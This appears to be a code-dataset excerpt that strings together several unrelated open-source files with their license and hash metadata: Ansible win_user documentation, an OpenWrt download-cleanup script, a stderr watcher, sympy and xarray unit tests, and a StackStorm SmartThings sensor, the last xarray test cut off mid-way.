choices: [ 'always', 'on_create' ]
default: always
version_added: "1.9"
password_expired:
description:
- C(yes) will require the user to change their password at next login.
C(no) will clear the expired password flag.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
password_never_expires:
description:
- C(yes) will set the password to never expire. C(no) will allow the
password to expire.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
user_cannot_change_password:
description:
- C(yes) will prevent the user from changing their password. C(no) will
allow the user to change their password.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
account_disabled:
description:
- C(yes) will disable the user account. C(no) will clear the disabled
flag.
required: false
choices: [ 'yes', 'no' ]
default: null
version_added: "1.9"
account_locked:
description:
- C(no) will unlock the user account if locked.
required: false
choices: [ 'no' ]
default: null
version_added: "1.9"
groups:
description:
- Adds or removes the user from this comma-separated list of groups,
depending on the value of I(groups_action). When I(groups_action) is
C(replace) and I(groups) is set to the empty string ('groups='), the
user is removed from all groups.
required: false
version_added: "1.9"
groups_action:
description:
- If C(replace), the user is added as a member of each group in
I(groups) and removed from any other groups. If C(add), the user is
added to each group in I(groups) where not already a member. If
C(remove), the user is removed from each group in I(groups).
required: false
choices: [ "replace", "add", "remove" ]
default: "replace"
version_added: "1.9"
state:
description:
- When C(present), creates or updates the user account. When C(absent),
removes the user account if it exists. When C(query) (new in 1.9),
retrieves the user account details without making any changes.
required: false
choices:
- present
- absent
- query
default: present
aliases: []
notes:
- For non-Windows targets, use the M(user) module instead.
author:
- "Paul Durivage (@angstwad)"
- "Chris Church (@cchurch)"
'''
EXAMPLES = r'''
- name: Ensure user bob is present
win_user:
name: bob
password: B0bP4ssw0rd
state: present
groups:
- Users
- name: Ensure user bob is absent
win_user:
name: bob
state: absent
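# Illustrative extra example (not part of the original module documentation);
# the group name and password below are hypothetical values.
- name: Add bob to Remote Desktop Users, keeping his existing group memberships
  win_user:
    name: bob
    password: B0bP4ssw0rd
    update_password: on_create
    state: present
    groups:
      - Remote Desktop Users
    groups_action: add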
'''
RETURN = r'''
account_disabled:
description: Whether the user is disabled.
returned: user exists
type: bool
sample: false
account_locked:
description: Whether the user is locked.
returned: user exists
type: bool
sample: false
description:
description: The description set for the user.
returned: user exists
type: str
sample: Username for test
fullname:
description: The full name set for the user.
returned: user exists
type: str
sample: Test Username
groups:
description: A list of groups and their ADSI path the user is a member of.
returned: user exists
type: list
sample: [
{
"name": "Administrators",
"path": "WinNT://WORKGROUP/USER-PC/Administrators"
}
]
name:
description: The name of the user
returned: always
type: str
sample: username
password_expired:
description: Whether the password is expired.
returned: user exists
type: bool
sample: false
password_never_expires:
description: Whether the password is set to never expire.
returned: user exists
type: bool
sample: true
path:
description: The ADSI path for the user.
returned: user exists
type: str
sample: "WinNT://WORKGROUP/USER-PC/username"
sid:
description: The SID for the user.
returned: user exists
type: str
sample: S-1-5-21-3322259488-2828151810-3939402796-1001
user_cannot_change_password:
description: Whether the user can change their own password.
returned: user exists
type: bool
sample: false
'''
| gpl-3.0 | -4,017,336,175,784,749,600 | 27.141553 | 78 | 0.668019 | false |
nxppru/zydiy | scripts/dl_cleanup.py | 223 | 6094 | #!/usr/bin/env python3
"""
# OpenWrt download directory cleanup utility.
# Delete all but the very last version of the program tarballs.
#
# Copyright (C) 2010-2015 Michael Buesch <[email protected]>
# Copyright (C) 2013-2015 OpenWrt.org
"""
from __future__ import print_function
import sys
import os
import re
import getopt
# Commandline options
opt_dryrun = False
def parseVer_1234(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32) |\
(int(match.group(5)) << 16)
return (progname, progversion)
def parseVer_123(match, filepath):
progname = match.group(1)
try:
patchlevel = match.group(5)
except IndexError as e:
patchlevel = None
if patchlevel:
patchlevel = ord(patchlevel[0])
else:
patchlevel = 0
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32) |\
patchlevel
return (progname, progversion)
def parseVer_12(match, filepath):
progname = match.group(1)
try:
patchlevel = match.group(4)
except IndexError as e:
patchlevel = None
if patchlevel:
patchlevel = ord(patchlevel[0])
else:
patchlevel = 0
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
patchlevel
return (progname, progversion)
def parseVer_r(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64)
return (progname, progversion)
def parseVer_ymd(match, filepath):
progname = match.group(1)
progversion = (int(match.group(2)) << 64) |\
(int(match.group(3)) << 48) |\
(int(match.group(4)) << 32)
return (progname, progversion)
def parseVer_GIT(match, filepath):
progname = match.group(1)
st = os.stat(filepath)
progversion = int(st.st_mtime) << 64
return (progname, progversion)
extensions = (
".tar.gz",
".tar.bz2",
".tar.xz",
".orig.tar.gz",
".orig.tar.bz2",
".orig.tar.xz",
".zip",
".tgz",
".tbz",
".txz",
)
versionRegex = (
(re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)\.(\d+)"), parseVer_1234), # xxx-1.2.3.4
(re.compile(r"(.+)[-_](\d\d\d\d)-?(\d\d)-?(\d\d)"), parseVer_ymd), # xxx-YYYY-MM-DD
(re.compile(r"(.+)[-_]([0-9a-fA-F]{40,40})"), parseVer_GIT), # xxx-GIT_SHASUM
(re.compile(r"(.+)[-_](\d+)\.(\d+)\.(\d+)(\w?)"), parseVer_123), # xxx-1.2.3a
(re.compile(r"(.+)[-_](\d+)_(\d+)_(\d+)"), parseVer_123), # xxx-1_2_3
(re.compile(r"(.+)[-_](\d+)\.(\d+)(\w?)"), parseVer_12), # xxx-1.2a
(re.compile(r"(.+)[-_]r?(\d+)"), parseVer_r), # xxx-r1111
)
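# Illustrative note (added comment, not in the original script): a name such as
# "foo-1.2.3.tar.gz" first has its extension stripped, then the patterns above
# are tried in order; parseVer_123 matches and returns
# ("foo", (1 << 64) | (2 << 48) | (3 << 32)), so a later "foo-1.2.4.tar.gz"
# compares greater through Entry.__ge__ and the older tarball gets deleted.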
blacklist = [
("linux", re.compile(r"linux-\d.*")),
("gcc", re.compile(r"gcc-.*")),
("wl_apsta", re.compile(r"wl_apsta.*")),
(".fw", re.compile(r".*\.fw")),
(".arm", re.compile(r".*\.arm")),
(".bin", re.compile(r".*\.bin")),
("rt-firmware", re.compile(r"RT[\d\w]+_Firmware.*")),
]
class EntryParseError(Exception): pass
class Entry:
def __init__(self, directory, filename):
self.directory = directory
self.filename = filename
self.progname = ""
self.fileext = ""
for ext in extensions:
if filename.endswith(ext):
filename = filename[0:0-len(ext)]
self.fileext = ext
break
else:
print(self.filename, "has an unknown file-extension")
raise EntryParseError("ext")
for (regex, parseVersion) in versionRegex:
match = regex.match(filename)
if match:
(self.progname, self.version) = parseVersion(
match, directory + "/" + filename + self.fileext)
break
else:
print(self.filename, "has an unknown version pattern")
raise EntryParseError("ver")
def getPath(self):
return (self.directory + "/" + self.filename).replace("//", "/")
def deleteFile(self):
path = self.getPath()
print("Deleting", path)
if not opt_dryrun:
os.unlink(path)
def __ge__(self, y):
return self.version >= y.version
def usage():
print("OpenWrt download directory cleanup utility")
print("Usage: " + sys.argv[0] + " [OPTIONS] <path/to/dl>")
print("")
print(" -d|--dry-run Do a dry-run. Don't delete any files")
print(" -B|--show-blacklist Show the blacklist and exit")
print(" -w|--whitelist ITEM Remove ITEM from blacklist")
def main(argv):
global opt_dryrun
try:
(opts, args) = getopt.getopt(argv[1:],
"hdBw:",
[ "help", "dry-run", "show-blacklist", "whitelist=", ])
if len(args) != 1:
usage()
return 1
except getopt.GetoptError as e:
usage()
return 1
directory = args[0]
for (o, v) in opts:
if o in ("-h", "--help"):
usage()
return 0
if o in ("-d", "--dry-run"):
opt_dryrun = True
if o in ("-w", "--whitelist"):
for i in range(0, len(blacklist)):
(name, regex) = blacklist[i]
if name == v:
del blacklist[i]
break
else:
print("Whitelist error: Item", v,\
"is not in blacklist")
return 1
if o in ("-B", "--show-blacklist"):
for (name, regex) in blacklist:
sep = "\t\t"
if len(name) >= 8:
sep = "\t"
print("%s%s(%s)" % (name, sep, regex.pattern))
return 0
# Create a directory listing and parse the file names.
entries = []
for filename in os.listdir(directory):
if filename == "." or filename == "..":
continue
for (name, regex) in blacklist:
if regex.match(filename):
if opt_dryrun:
print(filename, "is blacklisted")
break
else:
try:
entries.append(Entry(directory, filename))
except EntryParseError as e:
pass
# Create a map of programs
progmap = {}
for entry in entries:
if entry.progname in progmap.keys():
progmap[entry.progname].append(entry)
else:
progmap[entry.progname] = [entry,]
# Traverse the program map and delete everything but the last version
for prog in progmap:
lastVersion = None
versions = progmap[prog]
for version in versions:
if lastVersion is None or version >= lastVersion:
lastVersion = version
if lastVersion:
for version in versions:
if version is not lastVersion:
version.deleteFile()
if opt_dryrun:
print("Keeping", lastVersion.getPath())
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
| gpl-2.0 | -4,524,169,905,885,258,000 | 24.71308 | 84 | 0.614375 | false |
mindworker/so-bro | watcher.py | 1 | 1650 | import os
import sys
from select import select
from subprocess import Popen, PIPE
import rpyc
err = ""
def handleInterpreter(conn, fd, data):
global err
if fd == p.stderr.fileno():
datastr = str(data, 'utf8')
if datastr == '>>> ':
return
if 'Type "help", "copyright", "credits" or "license" for more information.' in datastr:
return
err += datastr
# errors seem to always end with >>>
if '>>> ' in datastr:
conn.root.add_err(err)
err = ""
def handleScript(conn, fd, data):
if fd == p.stderr.fileno():
# send to local debug service
conn.root.add_err(str(data, 'utf8'))
def handle(conn, fd, data, mode):
if mode == 'interpreter':
handleInterpreter(conn, fd, data)
else:
handleScript(conn, fd, data)
if __name__ == "__main__":
conn = rpyc.connect("localhost", 18861)
command = ['python']
mode = 'interpreter'
if len(sys.argv) > 1:
command = ['python'] + sys.argv[1:]
mode = 'script'
with Popen(command, stdout=PIPE, stderr=PIPE) as p:
readable = {
p.stdout.fileno(): sys.stdout.buffer,
p.stderr.fileno(): sys.stderr.buffer,
}
while readable:
for fd in select(readable, [], [])[0]:
data = os.read(fd, 1024) # read available
if not data: # EOF
del readable[fd]
continue
readable[fd].write(data)
readable[fd].flush()
handle(conn, fd, data, mode)
| mit | 388,884,385,238,412,700 | 23.626866 | 95 | 0.516364 | false |
pducks32/intergrala | python/sympy/sympy/utilities/tests/test_pytest.py | 105 | 1601 | from sympy.utilities.pytest import raises, USE_PYTEST
if USE_PYTEST:
import py.test
pytestmark = py.test.mark.skipif(USE_PYTEST,
reason=("using py.test"))
# Test callables
def test_expected_exception_is_silent_callable():
def f():
raise ValueError()
raises(ValueError, f)
def test_lack_of_exception_triggers_AssertionError_callable():
try:
raises(Exception, lambda: 1 + 1)
assert False
except AssertionError as e:
assert str(e) == "DID NOT RAISE"
def test_unexpected_exception_is_passed_through_callable():
def f():
raise ValueError("some error message")
try:
raises(TypeError, f)
assert False
except ValueError as e:
assert str(e) == "some error message"
# Test with statement
def test_expected_exception_is_silent_with():
with raises(ValueError):
raise ValueError()
def test_lack_of_exception_triggers_AssertionError_with():
try:
with raises(Exception):
1 + 1
assert False
except AssertionError as e:
assert str(e) == "DID NOT RAISE"
def test_unexpected_exception_is_passed_through_with():
try:
with raises(TypeError):
raise ValueError("some error message")
assert False
except ValueError as e:
assert str(e) == "some error message"
# Now we can use raises() instead of try/catch
# to test that a specific exception class is raised
def test_second_argument_should_be_callable_or_string():
raises(TypeError, lambda: raises("irrelevant", 42))
| mit | 2,815,751,586,308,831,000 | 24.412698 | 62 | 0.642723 | false |
pidah/st2contrib | packs/smartthings/sensors/smartthings_sensor.py | 10 | 2071 | import eventlet
import json
from flask import request, json, Flask, Response # noqa
from st2reactor.sensor.base import Sensor
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
class SmartThingsSensor(Sensor):
def __init__(self, sensor_service, config=None):
super(SmartThingsSensor, self).__init__(sensor_service=sensor_service,
config=config)
self._trigger = 'smartthings.event'
self._logger = self._sensor_service.get_logger(__name__)
self._listen_ip = self._config.get('listen_ip', '0.0.0.0')
self._listen_port = self._config.get('listen_port', '12000')
self._api_key = self._config.get('api_key', None)
self._app = Flask(__name__)
def setup(self):
pass
def run(self):
if not self._api_key:
raise Exception('[smartthings_sensor]: api_key config option not set')
# Routes
@self._app.route('/', methods=['PUT'])
def process_incoming():
response = None
if request.headers['X-Api-Key'] == self._api_key:
status = self._process_request(request)
response = Response(status[0], status=status[1])
else:
response = Response('fail', status=401)
return response
# Start the Flask App
self._app.run(host=self._listen_ip, port=self._listen_port)
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _process_request(self, request):
if request.headers['Content-Type'] == 'application/json':
payload = request.json
self._logger.debug('[smartthings_sensor]: processing request {}'.format(payload))
self._sensor_service.dispatch(trigger=self._trigger, payload=payload)
return ('ok', 200)
else:
return ('fail', 415)
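# Illustrative request (added comment, not in the original sensor): with the
# defaults above the sensor accepts a JSON PUT such as
#   curl -X PUT http://localhost:12000/ \
#        -H 'X-Api-Key: <configured api_key>' \
#        -H 'Content-Type: application/json' \
#        -d '{"deviceId": "example", "value": "on"}'
# Any JSON body is dispatched unchanged as the smartthings.event trigger payload.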
| apache-2.0 | -3,012,116,368,909,634,600 | 28.585714 | 93 | 0.577016 | false |
jhamman/xray | xarray/tests/test_variable.py | 1 | 54048 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
from copy import copy, deepcopy
from datetime import datetime, timedelta
from textwrap import dedent
import pytest
from distutils.version import LooseVersion
import numpy as np
import pytz
import pandas as pd
from xarray import Variable, IndexVariable, Coordinate, Dataset
from xarray.core import indexing
from xarray.core.variable import as_variable, as_compatible_data
from xarray.core.indexing import PandasIndexAdapter, LazilyIndexedArray
from xarray.core.pycompat import PY3, OrderedDict
from xarray.core.common import full_like, zeros_like, ones_like
from . import TestCase, source_ndarray, requires_dask
class VariableSubclassTestCases(object):
def test_properties(self):
data = 0.5 * np.arange(10)
v = self.cls(['time'], data, {'foo': 'bar'})
self.assertEqual(v.dims, ('time',))
self.assertArrayEqual(v.values, data)
self.assertEqual(v.dtype, float)
self.assertEqual(v.shape, (10,))
self.assertEqual(v.size, 10)
self.assertEqual(v.sizes, {'time': 10})
self.assertEqual(v.nbytes, 80)
self.assertEqual(v.ndim, 1)
self.assertEqual(len(v), 10)
self.assertEqual(v.attrs, {'foo': u'bar'})
def test_attrs(self):
v = self.cls(['time'], 0.5 * np.arange(10))
self.assertEqual(v.attrs, {})
attrs = {'foo': 'bar'}
v.attrs = attrs
self.assertEqual(v.attrs, attrs)
self.assertIsInstance(v.attrs, OrderedDict)
v.attrs['foo'] = 'baz'
self.assertEqual(v.attrs['foo'], 'baz')
def test_getitem_dict(self):
v = self.cls(['x'], np.random.randn(5))
actual = v[{'x': 0}]
expected = v[0]
self.assertVariableIdentical(expected, actual)
def _assertIndexedLikeNDArray(self, variable, expected_value0,
expected_dtype=None):
"""Given a 1-dimensional variable, verify that the variable is indexed
like a numpy.ndarray.
"""
self.assertEqual(variable[0].shape, ())
self.assertEqual(variable[0].ndim, 0)
self.assertEqual(variable[0].size, 1)
# test identity
self.assertTrue(variable.equals(variable.copy()))
self.assertTrue(variable.identical(variable.copy()))
# check value is equal for both ndarray and Variable
self.assertEqual(variable.values[0], expected_value0)
self.assertEqual(variable[0].values, expected_value0)
# check type or dtype is consistent for both ndarray and Variable
if expected_dtype is None:
# check output type instead of array dtype
self.assertEqual(type(variable.values[0]), type(expected_value0))
self.assertEqual(type(variable[0].values), type(expected_value0))
elif expected_dtype is not False:
self.assertEqual(variable.values[0].dtype, expected_dtype)
self.assertEqual(variable[0].values.dtype, expected_dtype)
def test_index_0d_int(self):
for value, dtype in [(0, np.int_),
(np.int32(0), np.int32)]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
def test_index_0d_float(self):
for value, dtype in [(0.5, np.float_),
(np.float32(0.5), np.float32)]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
def test_index_0d_string(self):
for value, dtype in [('foo', np.dtype('U3' if PY3 else 'S3')),
(u'foo', np.dtype('U3'))]:
x = self.cls(['x'], [value])
self._assertIndexedLikeNDArray(x, value, dtype)
def test_index_0d_datetime(self):
d = datetime(2000, 1, 1)
x = self.cls(['x'], [d])
self._assertIndexedLikeNDArray(x, np.datetime64(d))
x = self.cls(['x'], [np.datetime64(d)])
self._assertIndexedLikeNDArray(x, np.datetime64(d), 'datetime64[ns]')
x = self.cls(['x'], pd.DatetimeIndex([d]))
self._assertIndexedLikeNDArray(x, np.datetime64(d), 'datetime64[ns]')
def test_index_0d_timedelta64(self):
td = timedelta(hours=1)
x = self.cls(['x'], [np.timedelta64(td)])
self._assertIndexedLikeNDArray(x, np.timedelta64(td), 'timedelta64[ns]')
x = self.cls(['x'], pd.to_timedelta([td]))
self._assertIndexedLikeNDArray(x, np.timedelta64(td), 'timedelta64[ns]')
def test_index_0d_not_a_time(self):
d = np.datetime64('NaT', 'ns')
x = self.cls(['x'], [d])
self._assertIndexedLikeNDArray(x, d)
def test_index_0d_object(self):
class HashableItemWrapper(object):
def __init__(self, item):
self.item = item
def __eq__(self, other):
return self.item == other.item
def __hash__(self):
return hash(self.item)
def __repr__(self):
return '%s(item=%r)' % (type(self).__name__, self.item)
item = HashableItemWrapper((1, 2, 3))
x = self.cls('x', [item])
self._assertIndexedLikeNDArray(x, item, expected_dtype=False)
def test_0d_object_array_with_list(self):
listarray = np.empty((1,), dtype=object)
listarray[0] = [1, 2, 3]
x = self.cls('x', listarray)
assert x.data == listarray
assert x[0].data == listarray.squeeze()
assert x.squeeze().data == listarray.squeeze()
def test_index_and_concat_datetime(self):
# regression test for #125
date_range = pd.date_range('2011-09-01', periods=10)
for dates in [date_range, date_range.values,
date_range.to_pydatetime()]:
expected = self.cls('t', dates)
for times in [[expected[i] for i in range(10)],
[expected[i:(i + 1)] for i in range(10)],
[expected[[i]] for i in range(10)]]:
actual = Variable.concat(times, 't')
self.assertEqual(expected.dtype, actual.dtype)
self.assertArrayEqual(expected, actual)
def test_0d_time_data(self):
# regression test for #105
x = self.cls('time', pd.date_range('2000-01-01', periods=5))
expected = np.datetime64('2000-01-01T00Z', 'ns')
self.assertEqual(x[0].values, expected)
def test_datetime64_conversion(self):
times = pd.date_range('2000-01-01', periods=3)
for values, preserve_source in [
(times, True),
(times.values, True),
(times.values.astype('datetime64[s]'), False),
(times.to_pydatetime(), False),
]:
v = self.cls(['t'], values)
self.assertEqual(v.dtype, np.dtype('datetime64[ns]'))
self.assertArrayEqual(v.values, times.values)
self.assertEqual(v.values.dtype, np.dtype('datetime64[ns]'))
same_source = source_ndarray(v.values) is source_ndarray(values)
assert preserve_source == same_source
def test_timedelta64_conversion(self):
times = pd.timedelta_range(start=0, periods=3)
for values, preserve_source in [
(times, True),
(times.values, True),
(times.values.astype('timedelta64[s]'), False),
(times.to_pytimedelta(), False),
]:
v = self.cls(['t'], values)
self.assertEqual(v.dtype, np.dtype('timedelta64[ns]'))
self.assertArrayEqual(v.values, times.values)
self.assertEqual(v.values.dtype, np.dtype('timedelta64[ns]'))
same_source = source_ndarray(v.values) is source_ndarray(values)
assert preserve_source == same_source
def test_object_conversion(self):
data = np.arange(5).astype(str).astype(object)
actual = self.cls('x', data)
self.assertEqual(actual.dtype, data.dtype)
def test_pandas_data(self):
v = self.cls(['x'], pd.Series([0, 1, 2], index=[3, 2, 1]))
self.assertVariableIdentical(v, v[[0, 1, 2]])
v = self.cls(['x'], pd.Index([0, 1, 2]))
self.assertEqual(v[0].values, v.values[0])
def test_pandas_period_index(self):
v = self.cls(['x'], pd.period_range(start='2000', periods=20, freq='B'))
self.assertEqual(v[0], pd.Period('2000', freq='B'))
assert "Period('2000-01-03', 'B')" in repr(v)
def test_1d_math(self):
x = 1.0 * np.arange(5)
y = np.ones(5)
# should we need `.to_base_variable()`?
# probably a break that `+v` changes type?
v = self.cls(['x'], x)
base_v = v.to_base_variable()
# unary ops
self.assertVariableIdentical(base_v, +v)
self.assertVariableIdentical(base_v, abs(v))
self.assertArrayEqual((-v).values, -x)
# binary ops with numbers
self.assertVariableIdentical(base_v, v + 0)
self.assertVariableIdentical(base_v, 0 + v)
self.assertVariableIdentical(base_v, v * 1)
self.assertArrayEqual((v > 2).values, x > 2)
self.assertArrayEqual((0 == v).values, 0 == x)
self.assertArrayEqual((v - 1).values, x - 1)
self.assertArrayEqual((1 - v).values, 1 - x)
# binary ops with numpy arrays
self.assertArrayEqual((v * x).values, x ** 2)
self.assertArrayEqual((x * v).values, x ** 2)
self.assertArrayEqual(v - y, v - 1)
self.assertArrayEqual(y - v, 1 - v)
# verify attributes are dropped
v2 = self.cls(['x'], x, {'units': 'meters'})
self.assertVariableIdentical(base_v, +v2)
# binary ops with all variables
self.assertArrayEqual(v + v, 2 * v)
w = self.cls(['x'], y, {'foo': 'bar'})
self.assertVariableIdentical(v + w, self.cls(['x'], x + y).to_base_variable())
self.assertArrayEqual((v * w).values, x * y)
# something complicated
self.assertArrayEqual((v ** 2 * w - 1 + x).values, x ** 2 * y - 1 + x)
# make sure dtype is preserved (for Index objects)
self.assertEqual(float, (+v).dtype)
self.assertEqual(float, (+v).values.dtype)
self.assertEqual(float, (0 + v).dtype)
self.assertEqual(float, (0 + v).values.dtype)
# check types of returned data
self.assertIsInstance(+v, Variable)
self.assertNotIsInstance(+v, IndexVariable)
self.assertIsInstance(0 + v, Variable)
self.assertNotIsInstance(0 + v, IndexVariable)
def test_1d_reduce(self):
x = np.arange(5)
v = self.cls(['x'], x)
actual = v.sum()
expected = Variable((), 10)
self.assertVariableIdentical(expected, actual)
self.assertIs(type(actual), Variable)
def test_array_interface(self):
x = np.arange(5)
v = self.cls(['x'], x)
self.assertArrayEqual(np.asarray(v), x)
# test patched in methods
self.assertArrayEqual(v.astype(float), x.astype(float))
# think this is a break, that argsort changes the type
self.assertVariableIdentical(v.argsort(), v.to_base_variable())
self.assertVariableIdentical(v.clip(2, 3),
self.cls('x', x.clip(2, 3)).to_base_variable())
# test ufuncs
self.assertVariableIdentical(np.sin(v), self.cls(['x'], np.sin(x)).to_base_variable())
self.assertIsInstance(np.sin(v), Variable)
self.assertNotIsInstance(np.sin(v), IndexVariable)
def example_1d_objects(self):
for data in [range(3),
0.5 * np.arange(3),
0.5 * np.arange(3, dtype=np.float32),
pd.date_range('2000-01-01', periods=3),
np.array(['a', 'b', 'c'], dtype=object)]:
yield (self.cls('x', data), data)
def test___array__(self):
for v, data in self.example_1d_objects():
self.assertArrayEqual(v.values, np.asarray(data))
self.assertArrayEqual(np.asarray(v), np.asarray(data))
self.assertEqual(v[0].values, np.asarray(data)[0])
self.assertEqual(np.asarray(v[0]), np.asarray(data)[0])
def test_equals_all_dtypes(self):
for v, _ in self.example_1d_objects():
v2 = v.copy()
self.assertTrue(v.equals(v2))
self.assertTrue(v.identical(v2))
self.assertTrue(v.no_conflicts(v2))
self.assertTrue(v[0].equals(v2[0]))
self.assertTrue(v[0].identical(v2[0]))
self.assertTrue(v[0].no_conflicts(v2[0]))
self.assertTrue(v[:2].equals(v2[:2]))
self.assertTrue(v[:2].identical(v2[:2]))
self.assertTrue(v[:2].no_conflicts(v2[:2]))
def test_eq_all_dtypes(self):
# ensure that we don't choke on comparisons for which numpy returns
# scalars
expected = Variable('x', 3 * [False])
for v, _ in self.example_1d_objects():
actual = 'z' == v
self.assertVariableIdentical(expected, actual)
actual = ~('z' != v)
self.assertVariableIdentical(expected, actual)
def test_encoding_preserved(self):
expected = self.cls('x', range(3), {'foo': 1}, {'bar': 2})
for actual in [expected.T,
expected[...],
expected.squeeze(),
expected.isel(x=slice(None)),
expected.set_dims({'x': 3}),
expected.copy(deep=True),
expected.copy(deep=False)]:
self.assertVariableIdentical(expected.to_base_variable(),
actual.to_base_variable())
self.assertEqual(expected.encoding, actual.encoding)
def test_concat(self):
x = np.arange(5)
y = np.arange(5, 10)
v = self.cls(['a'], x)
w = self.cls(['a'], y)
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat([v, w], 'b'))
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat((v, w), 'b'))
self.assertVariableIdentical(Variable(['b', 'a'], np.array([x, y])),
Variable.concat((v, w), 'b'))
with self.assertRaisesRegexp(ValueError, 'inconsistent dimensions'):
Variable.concat([v, Variable(['c'], y)], 'b')
# test indexers
actual = Variable.concat(
[v, w],
positions=[np.arange(0, 10, 2), np.arange(1, 10, 2)],
dim='a')
expected = Variable('a', np.array([x, y]).ravel(order='F'))
self.assertVariableIdentical(expected, actual)
# test concatenating along a dimension
v = Variable(['time', 'x'], np.random.random((10, 8)))
self.assertVariableIdentical(v, Variable.concat([v[:5], v[5:]], 'time'))
self.assertVariableIdentical(v, Variable.concat([v[:5], v[5:6], v[6:]], 'time'))
self.assertVariableIdentical(v, Variable.concat([v[:1], v[1:]], 'time'))
# test dimension order
self.assertVariableIdentical(v, Variable.concat([v[:, :5], v[:, 5:]], 'x'))
with self.assertRaisesRegexp(ValueError, 'all input arrays must have'):
Variable.concat([v[:, 0], v[:, 1:]], 'x')
def test_concat_attrs(self):
# different or conflicting attributes should be removed
v = self.cls('a', np.arange(5), {'foo': 'bar'})
w = self.cls('a', np.ones(5))
expected = self.cls('a', np.concatenate([np.arange(5), np.ones(5)])).to_base_variable()
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
w.attrs['foo'] = 2
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
w.attrs['foo'] = 'bar'
expected.attrs['foo'] = 'bar'
self.assertVariableIdentical(expected, Variable.concat([v, w], 'a'))
def test_concat_fixed_len_str(self):
# regression test for #217
for kind in ['S', 'U']:
x = self.cls('animal', np.array(['horse'], dtype=kind))
y = self.cls('animal', np.array(['aardvark'], dtype=kind))
actual = Variable.concat([x, y], 'animal')
expected = Variable(
'animal', np.array(['horse', 'aardvark'], dtype=kind))
self.assertVariableEqual(expected, actual)
def test_concat_number_strings(self):
# regression test for #305
a = self.cls('x', ['0', '1', '2'])
b = self.cls('x', ['3', '4'])
actual = Variable.concat([a, b], dim='x')
expected = Variable('x', np.arange(5).astype(str).astype(object))
self.assertVariableIdentical(expected, actual)
self.assertEqual(expected.dtype, object)
self.assertEqual(type(expected.values[0]), str)
def test_copy(self):
v = self.cls('x', 0.5 * np.arange(10), {'foo': 'bar'})
for deep in [True, False]:
w = v.copy(deep=deep)
self.assertIs(type(v), type(w))
self.assertVariableIdentical(v, w)
self.assertEqual(v.dtype, w.dtype)
if self.cls is Variable:
if deep:
self.assertIsNot(source_ndarray(v.values),
source_ndarray(w.values))
else:
self.assertIs(source_ndarray(v.values),
source_ndarray(w.values))
self.assertVariableIdentical(v, copy(v))
def test_copy_index(self):
midx = pd.MultiIndex.from_product([['a', 'b'], [1, 2], [-1, -2]],
names=('one', 'two', 'three'))
v = self.cls('x', midx)
for deep in [True, False]:
w = v.copy(deep=deep)
self.assertIsInstance(w._data, PandasIndexAdapter)
self.assertIsInstance(w.to_index(), pd.MultiIndex)
self.assertArrayEqual(v._data.array, w._data.array)
def test_real_and_imag(self):
v = self.cls('x', np.arange(3) - 1j * np.arange(3), {'foo': 'bar'})
expected_re = self.cls('x', np.arange(3), {'foo': 'bar'})
self.assertVariableIdentical(v.real, expected_re)
expected_im = self.cls('x', -np.arange(3), {'foo': 'bar'})
self.assertVariableIdentical(v.imag, expected_im)
expected_abs = self.cls('x', np.sqrt(2 * np.arange(3) ** 2)).to_base_variable()
self.assertVariableAllClose(abs(v), expected_abs)
def test_aggregate_complex(self):
# should skip NaNs
v = self.cls('x', [1, 2j, np.nan])
expected = Variable((), 0.5 + 1j)
self.assertVariableAllClose(v.mean(), expected)
def test_pandas_categorical_dtype(self):
data = pd.Categorical(np.arange(10, dtype='int64'))
v = self.cls('x', data)
print(v) # should not error
assert v.dtype == 'int64'
def test_pandas_datetime64_with_tz(self):
data = pd.date_range(start='2000-01-01',
tz=pytz.timezone('America/New_York'),
periods=10, freq='1h')
v = self.cls('x', data)
print(v) # should not error
if 'America/New_York' in str(data.dtype):
# pandas is new enough that it has datetime64 with timezone dtype
assert v.dtype == 'object'
def test_multiindex(self):
idx = pd.MultiIndex.from_product([list('abc'), [0, 1]])
v = self.cls('x', idx)
self.assertVariableIdentical(Variable((), ('a', 0)), v[0])
self.assertVariableIdentical(v, v[:])
def test_load(self):
array = self.cls('x', np.arange(5))
orig_data = array._data
copied = array.copy(deep=True)
array.load()
assert type(array._data) is type(orig_data)
assert type(copied._data) is type(orig_data)
self.assertVariableIdentical(array, copied)
class TestVariable(TestCase, VariableSubclassTestCases):
cls = staticmethod(Variable)
def setUp(self):
self.d = np.random.random((10, 3)).astype(np.float64)
def test_data_and_values(self):
v = Variable(['time', 'x'], self.d)
self.assertArrayEqual(v.data, self.d)
self.assertArrayEqual(v.values, self.d)
self.assertIs(source_ndarray(v.values), self.d)
with self.assertRaises(ValueError):
# wrong size
v.values = np.random.random(5)
d2 = np.random.random((10, 3))
v.values = d2
self.assertIs(source_ndarray(v.values), d2)
d3 = np.random.random((10, 3))
v.data = d3
self.assertIs(source_ndarray(v.data), d3)
def test_numpy_same_methods(self):
v = Variable([], np.float32(0.0))
self.assertEqual(v.item(), 0)
self.assertIs(type(v.item()), float)
v = IndexVariable('x', np.arange(5))
self.assertEqual(2, v.searchsorted(2))
def test_datetime64_conversion_scalar(self):
expected = np.datetime64('2000-01-01T00:00:00Z', 'ns')
for values in [
np.datetime64('2000-01-01T00Z'),
pd.Timestamp('2000-01-01T00'),
datetime(2000, 1, 1),
]:
v = Variable([], values)
